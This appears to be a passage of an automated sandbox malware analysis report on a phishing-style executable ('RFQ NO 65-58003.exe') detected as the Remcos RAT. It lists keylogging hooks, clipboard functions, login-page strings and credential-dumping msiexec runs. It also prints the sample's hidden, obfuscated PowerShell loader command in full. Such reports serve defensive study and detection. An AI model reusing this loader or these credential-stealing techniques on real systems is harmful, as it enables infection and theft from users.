              Source: msiexec.exe, 00000011.00000002.2923434065.0000000002CBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live
              Source: msiexec.exe, 00000011.00000002.2923434065.0000000002CBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oau.
              Source: msiexec.exe, 00000011.00000002.2923731406.00000000030CA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000011.00000003.2922976948.00000000030CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfh
              Source: msiexec.exeString found in binary or memory: https://login.yahoo.com/config/login
              Source: msiexec.exe, msiexec.exe, 00000014.00000002.2903934720.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: msiexec.exeString found in binary or memory: https://www.google.com/accounts/servicelogin

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Installs a global keyboard hook
              Source: C:\Windows\SysWOW64\msiexec.exeWindows user hook set: 0 keyboard low level C:\Windows\System32\msiexec.exeJump to behavior
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exeCode function: 0_2_004054B0 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004054B0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,17_2_0040987A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,17_2_004098E2
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,19_2_00406DFC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,19_2_00406E9F
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,20_2_004068B5
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,20_2_004072B5

              E-Banking Fraud

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 0000000E.00000003.2928845396.00000000056FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000003.2898152047.0000000005709000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.3394879441.00000000056CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000003.2928001965.00000000056F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000003.2899931678.0000000005709000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.3394879441.00000000056E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.3391979783.000000000287F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000003.3221293540.0000000005709000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.3394879441.00000000056B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000003.2896409361.0000000005709000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.3395028821.0000000005709000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 4552, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

              System Summary

              barindex
              Initial sample is a PE file and has a suspicious name
              Source: initial sampleStatic PE information: Filename: RFQ NO 65-58003.exe
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,17_2_0040DD85
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_00401806 NtdllDefWindowProc_W,17_2_00401806
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_004018C0 NtdllDefWindowProc_W,17_2_004018C0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_004016FD NtdllDefWindowProc_A,19_2_004016FD
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_004017B7 NtdllDefWindowProc_A,19_2_004017B7
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_00402CAC NtdllDefWindowProc_A,20_2_00402CAC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_00402D66 NtdllDefWindowProc_A,20_2_00402D66
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exeCode function: 0_2_0040344A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,CoUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040344A
              Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exeCode function: 0_2_004068DA0_2_004068DA
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exeCode function: 0_2_00404CED0_2_00404CED
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_2121719414_2_21217194
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_2120B5C114_2_2120B5C1
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_0044B04017_2_0044B040
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_0043610D17_2_0043610D
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_0044731017_2_00447310
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_0044A49017_2_0044A490
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_0040755A17_2_0040755A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_0043C56017_2_0043C560
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_0044B61017_2_0044B610
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_0044D6C017_2_0044D6C0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_004476F017_2_004476F0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_0044B87017_2_0044B870
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_0044081D17_2_0044081D
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_0041495717_2_00414957
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_004079EE17_2_004079EE
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_00407AEB17_2_00407AEB
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_0044AA8017_2_0044AA80
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_00412AA917_2_00412AA9
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_00404B7417_2_00404B74
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_00404B0317_2_00404B03
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_0044BBD817_2_0044BBD8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_00404BE517_2_00404BE5
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_00404C7617_2_00404C76
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_00415CFE17_2_00415CFE
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_00416D7217_2_00416D72
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_00446D3017_2_00446D30
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_00446D8B17_2_00446D8B
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_00406E8F17_2_00406E8F
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_0040503819_2_00405038
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_0041208C19_2_0041208C
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_004050A919_2_004050A9
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_0040511A19_2_0040511A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_0043C13A19_2_0043C13A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_004051AB19_2_004051AB
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_0044930019_2_00449300
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_0040D32219_2_0040D322
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_0044A4F019_2_0044A4F0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_0043A5AB19_2_0043A5AB
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_0041363119_2_00413631
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_0044669019_2_00446690
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_0044A73019_2_0044A730
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_004398D819_2_004398D8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_004498E019_2_004498E0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_0044A88619_2_0044A886
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_0043DA0919_2_0043DA09
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_00438D5E19_2_00438D5E
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_00449ED019_2_00449ED0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_0041FE8319_2_0041FE83
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_00430F5419_2_00430F54
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_004050C220_2_004050C2
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_004014AB20_2_004014AB
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_0040513320_2_00405133
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_004051A420_2_004051A4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_0040124620_2_00401246
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_0040CA4620_2_0040CA46
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_0040523520_2_00405235
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_004032C820_2_004032C8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_0040168920_2_00401689
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_00402F6020_2_00402F60
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 004169A7 appears 87 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0044DB70 appears 41 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 004165FF appears 35 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00422297 appears 42 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00444B5A appears 37 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00413025 appears 79 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00416760 appears 69 times
              Source: RFQ NO 65-58003.exeStatic PE information: invalid certificate
              Source: RFQ NO 65-58003.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@28/20@1/4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,17_2_004182CE
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exeCode function: 0_2_0040344A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,CoUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040344A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,20_2_00410DE1
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exeCode function: 0_2_00404771 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404771
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle,17_2_00413D4C
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exeCode function: 0_2_00402104 CoCreateInstance,0_2_00402104
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_004148B6 FindResourceW,SizeofResource,LoadResource,LockResource,17_2_004148B6
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exeFile created: C:\Users\user\AppData\Roaming\afdragsordningJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-HSAM04
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5208:120:WilError_03
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exeFile created: C:\Users\user\AppData\Local\Temp\nsx559.tmpJump to behavior
              Source: RFQ NO 65-58003.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\SysWOW64\msiexec.exeSystem information queried: HandleInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: msiexec.exe, msiexec.exe, 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: msiexec.exe, msiexec.exe, 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: msiexec.exe, 0000000E.00000002.3407952469.0000000021650000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: msiexec.exe, msiexec.exe, 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: msiexec.exe, msiexec.exe, 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: msiexec.exe, msiexec.exe, 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: msiexec.exe, 00000011.00000002.2924013215.0000000004962000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: msiexec.exe, msiexec.exe, 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: RFQ NO 65-58003.exeVirustotal: Detection: 13%
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exeFile read: C:\Users\user\Desktop\RFQ NO 65-58003.exeJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeEvasive API call chain: __getmainargs,DecisionNodes,exit
              Source: unknownProcess created: C:\Users\user\Desktop\RFQ NO 65-58003.exe "C:\Users\user\Desktop\RFQ NO 65-58003.exe"
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Sonnetish=gc -raw 'C:\Users\user\AppData\Roaming\afdragsordning\Rygklapperne.Tis225';$Gastriskes=$Sonnetish.SubString(65822,3);.$Gastriskes($Sonnetish)
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\vucumrgsvevkhhxckfc"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\vucumrgsvevkhhxckfc"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fpinncqmjmnpjnlobqoxqa"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fpinncqmjmnpjnlobqoxqa"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\irnfnubnwufuubhrkbjztnmhqi"
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Sonnetish=gc -raw 'C:\Users\user\AppData\Roaming\afdragsordning\Rygklapperne.Tis225';$Gastriskes=$Sonnetish.SubString(65822,3);.$Gastriskes($Sonnetish)Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\vucumrgsvevkhhxckfc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\vucumrgsvevkhhxckfc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fpinncqmjmnpjnlobqoxqa"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fpinncqmjmnpjnlobqoxqa"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\irnfnubnwufuubhrkbjztnmhqi"Jump to behavior
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exeSection loaded: oleacc.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exeSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exeSection loaded: riched20.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exeSection loaded: usp10.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
